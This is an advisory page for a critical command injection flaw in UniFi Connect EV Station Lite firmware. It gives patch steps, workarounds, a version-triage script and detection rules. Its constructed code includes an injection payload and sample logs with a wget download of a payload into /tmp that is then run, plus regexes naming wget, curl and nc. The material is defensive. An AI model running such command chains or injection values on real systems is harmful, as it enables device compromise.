CVE-2025-24285

Severity: 9.8 CRITICAL (CVSS base score)

📋 TL;DR

This CVE covers command injection vulnerabilities in UniFi Connect EV Station Lite that allow an attacker with network access to the device to execute arbitrary commands on it. Affected: firmware versions 1.5.1 and earlier; fixed in 1.5.2. Successful exploitation can lead to complete compromise of the charging station.

💻 Affected Systems

Products:
  • UniFi Connect EV Station Lite
Versions: 1.5.1 and earlier
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: The flaw is present in the default configuration; no special setting enables it. The attacker needs network reachability to the device, so exposure is governed by which networks can reach it.

⚠️ Manual Verification Required

Automated scanners may not flag this CVE: the NVD entry is reported to carry no machine-readable version ranges, so a scanner that matches on CPE/version data cannot decide whether a given device is affected. The vendor advisory does state the range (1.5.1 and earlier affected, 1.5.2 and later fixed), so verify by hand against that.

Recommended Actions:
  1. Review the CVE details at NVD.
  2. Read the vendor advisory (linked under Fix & Mitigation) and compare the firmware version on each EV Station Lite against it.
  3. Assess exposure: which networks and hosts can reach the device.
  4. Update any device running 1.5.1 or earlier to 1.5.2 or later.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Full system compromise: the attacker executes arbitrary commands, gains persistent access, disrupts charging operations, or uses the device as a pivot point into the rest of the network.

🟠 Likely Case

Remote code execution allowing the attacker to modify device configuration, disrupt charging services, or install malware for persistence.

🟢 If Mitigated

Limited impact if the device sits behind a firewall with strict network segmentation and access controls, since the attacker must first reach it.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ None known
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The attack requires network reachability to the device but no credentials. Command injection is usually low complexity to exploit: once the injection point is known, a single crafted request carrying shell metacharacters is enough, with no memory corruption or timing dependency involved.
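To make the vulnerability class concrete, here is an added, hypothetical Python illustration of OS command injection (CWE-78) next to its hardened form. It is not the EV Station Lite firmware and does not reflect the real injection point, which the advisory does not disclose; it assumes a made-up "diagnostic" handler that receives a hostname over the network, and uses `echo` in place of a real network tool so that it runs offline.

```python
import re
import subprocess

# Constructed, hypothetical handler. `echo` stands in for a real network tool so the
# example runs offline; the real EV Station Lite code is not shown in the advisory,
# and this is not it.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def diagnostic_vulnerable(host: str) -> str:
    """Untrusted input interpolated into a shell command line (CWE-78).

    A value such as '10.0.0.5; echo INJECTED' ends the intended command at ';'
    and the shell runs whatever follows as a second command.
    """
    cmd = f"echo diagnostic for {host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def diagnostic_hardened(host: str) -> str:
    """Allowlist-validate the value, then execute without a shell.

    With an argv list there is no shell to interpret metacharacters, so even a
    value that slipped past validation would reach the program as one literal
    argument rather than as a second command.
    """
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected hostname: {host!r}")
    out = subprocess.run(["echo", "diagnostic", "for", host],
                         capture_output=True, text=True, check=True)
    return out.stdout


def hardened_rejects(host: str) -> bool:
    """True if the hardened handler refuses the value instead of running it."""
    try:
        diagnostic_hardened(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "10.0.0.5; echo INJECTED"
    print(diagnostic_vulnerable(payload))   # second output line is attacker-controlled
    print(hardened_rejects(payload))        # True
```

The two defences are independent: the allowlist rejects the payload up front, and the argv-list call removes the shell entirely, so a validation gap would still not yield command execution.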

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.5.2 or later

Vendor Advisory: https://community.ui.com/releases/Security-Advisory-Bulletin-052-052/ac1251ee-5bb5-4cdf-8a71-68acd1775bb6

Restart Required: Yes

Instructions:

1. Log into the UniFi Connect application, which manages UniFi Connect devices such as the EV Station Lite.
2. Navigate to the Devices section.
3. Select the affected EV Station Lite.
4. Click Update.
5. Wait for the device to download and install the update.
6. The device restarts automatically; confirm it comes back on 1.5.2 or later.

🔧 Temporary Workarounds

Network Segmentation (applies to all deployments)

Isolate the EV Station Lite on a separate VLAN with strict firewall rules.

Access Control (applies to all deployments)

Restrict network access to the EV Station Lite to the management hosts that need it, using firewall rules.

🧯 If You Can't Patch

  • Isolate the device on a separate network segment with no internet access
  • Implement strict firewall rules that allow only the necessary management IPs to reach the device
  • Treat these as exposure reduction, not a fix: anything on the same segment that can reach the device can still exploit it, so patch as soon as the update can be scheduled

🔍 How to Verify

Check if Vulnerable:

Check the device firmware version in the UniFi Connect application under Devices > EV Station Lite > Properties. Any version at or below 1.5.1 is affected.

Check Version:

Read the version in the UniFi Connect application UI or, if SSH to the device is enabled, log in and run 'cat /etc/version'.

Verify Fix Applied:

Confirm the device shows version 1.5.2 or later in the UniFi Connect application after the update and restart.
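When more than a handful of stations are deployed, comparing versions by hand is error-prone, and plain string comparison gets it wrong (as text, "1.5.10" sorts before "1.5.2"). The following is an added example, not a tool from the vendor or from this page: it parses version strings into integer tuples, compares them against the fixed release named in the advisory, and triages a constructed inventory. The inventory entries and device names are made up.

```python
import re

FIXED_VERSION = "1.5.2"   # from the vendor advisory: 1.5.1 and earlier are affected

_VERSION_RE = re.compile(r"^v?(?P<num>\d+(?:\.\d+)*)(?P<suffix>.*)$")


def parse_version(text: str):
    """Return (numeric_tuple, suffix): '1.5.1' -> ((1, 5, 1), ''), 'v1.5.2-rc1' -> ((1, 5, 2), '-rc1')."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    nums = tuple(int(x) for x in m.group("num").split("."))
    return nums, m.group("suffix")


def _pad(nums, width):
    # Right-pad with zeros so '1.5' compares as (1, 5, 0).
    return nums + (0,) * (width - len(nums))


def is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when `version` sorts below the fixed release.

    Integer comparison avoids the string trap ('1.5.10' < '1.5.2' as text).
    A suffixed version numerically equal to the fix (e.g. 1.5.2-rc1) is treated
    as still vulnerable, since a pre-release predates the release it names.
    """
    (a, a_suffix), (b, _) = parse_version(version), parse_version(fixed)
    width = max(len(a), len(b))
    a_key, b_key = _pad(a, width), _pad(b, width)
    if a_key == b_key and a_suffix:
        return True
    return a_key < b_key


def triage(inventory):
    """inventory: iterable of (device_name, version_string) -> {device_name: status}."""
    result = {}
    for name, version in inventory:
        try:
            result[name] = "vulnerable" if is_vulnerable(version) else "patched"
        except ValueError:
            result[name] = "unknown-version"   # surface for manual follow-up
    return result


# Constructed inventory; these are not real devices.
SAMPLE_INVENTORY = [
    ("ev-lite-lobby", "1.5.1"),
    ("ev-lite-garage", "1.5.2"),
    ("ev-lite-annex", "1.5.10"),
    ("ev-lite-lab", "v1.5.2-rc1"),
    ("ev-lite-dock", "n/a"),
]

if __name__ == "__main__":
    for name, status in triage(SAMPLE_INVENTORY).items():
        print(f"{name:16s} {status}")
```

Feed it the version strings exported from the UniFi Connect device list; anything reported as "unknown-version" needs a manual look rather than being assumed safe.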

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in system logs, in particular shell invocations whose command line contains metacharacters (;, |, &&, $( )) or references to /tmp
  • Unexpected process creation, especially processes started from writable scratch locations
  • Failed authentication attempts against device management (not required for this exploit, but a sign someone is probing the device)

Network Indicators:

  • Unusual outbound connections from the EV Station (it normally talks only to its controller)
  • Unexpected network traffic patterns
  • Connection attempts to known malicious IPs

SIEM Query:

source="ev-station-logs" AND (process="bash" OR process="sh" OR cmd="*;*" OR cmd="*|*")

The source and field names above are placeholders; map them to whatever your syslog export from the device actually emits. On its own, matching ";" or "|" in a command line is noisy, since legitimate maintenance pipelines use the same characters, so pair the match with a second indicator (a download tool, execution from /tmp, an unexpected outbound connection) before paging anyone.
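As an added example of that detection logic (not the page's own tooling, and not tied to the device's real log format, which the page does not document), the following Python runs the metacharacter check over a few constructed exec records and adds the second indicator so that a benign `cat ... | head` pipeline is surfaced at low severity while a download-and-run-from-/tmp chain is flagged high. The log line shape, field names and IP addresses are all assumptions.

```python
import re

# Constructed sample lines. The EV Station Lite's real log format is not documented on
# this page, so the line shape and the field names in EXEC_RE are assumptions; adapt
# the regex to whatever your syslog/auditd export actually emits.
SAMPLE_LOGS = """\
2025-03-12T10:01:02Z ev-station-1 mgmtd[412]: exec pid=501 comm=sh cmd="sh -c 'ping -c 1 10.0.0.5'"
2025-03-12T10:01:05Z ev-station-1 mgmtd[412]: exec pid=502 comm=sh cmd="sh -c 'ping -c 1 10.0.0.5; wget http://198.51.100.7/x -O /tmp/x'"
2025-03-12T10:01:06Z ev-station-1 mgmtd[412]: exec pid=503 comm=sh cmd="sh -c '/tmp/x'"
2025-03-12T10:02:00Z ev-station-1 chargerd[99]: session start connector=1
2025-03-12T10:03:10Z ev-station-1 mgmtd[412]: exec pid=510 comm=sh cmd="sh -c 'cat /etc/version | head -1'"
"""

EXEC_RE = re.compile(r'exec pid=(?P<pid>\d+) comm=(?P<comm>\S+) cmd="(?P<cmd>.*)"$')

# Shell metacharacters that splice a second command onto the intended one.
META_RE = re.compile(r"[;|&`]|\$\(")
# Tooling typically used to fetch a second-stage payload onto the device.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget|nc|ncat)\b")
# Execution from, or writes to, world-writable scratch locations.
SCRATCH_RE = re.compile(r"(?:^|[\s'\"])/(?:tmp|var/tmp|dev/shm)/\S+")


def classify(cmd: str):
    """Return 'high', 'low' or None for one command line."""
    meta = bool(META_RE.search(cmd))
    download = bool(DOWNLOAD_RE.search(cmd))
    scratch = bool(SCRATCH_RE.search(cmd))
    if scratch or (meta and download):
        return "high"
    if meta:
        # Metacharacters alone also match legitimate admin pipelines; surface for review.
        return "low"
    return None


def scan(text: str):
    """Parse exec records and return findings as dicts (pid, comm, cmd, severity)."""
    findings = []
    for line in text.splitlines():
        m = EXEC_RE.search(line)
        if not m:
            continue   # not a process-execution record
        severity = classify(m["cmd"])
        if severity:
            findings.append({"pid": int(m["pid"]), "comm": m["comm"],
                             "cmd": m["cmd"], "severity": severity})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[{f['severity']:4s}] pid={f['pid']} {f['cmd']}")
```

The same three rules translate directly into a SIEM correlation: alert when a shell exec with metacharacters is followed within a short window by a download tool or by execution from a scratch directory, and route metacharacter-only matches to a review queue.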

🔗 References

  • Ubiquiti Security Advisory Bulletin 052: https://community.ui.com/releases/Security-Advisory-Bulletin-052-052/ac1251ee-5bb5-4cdf-8a71-68acd1775bb6
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2025-24285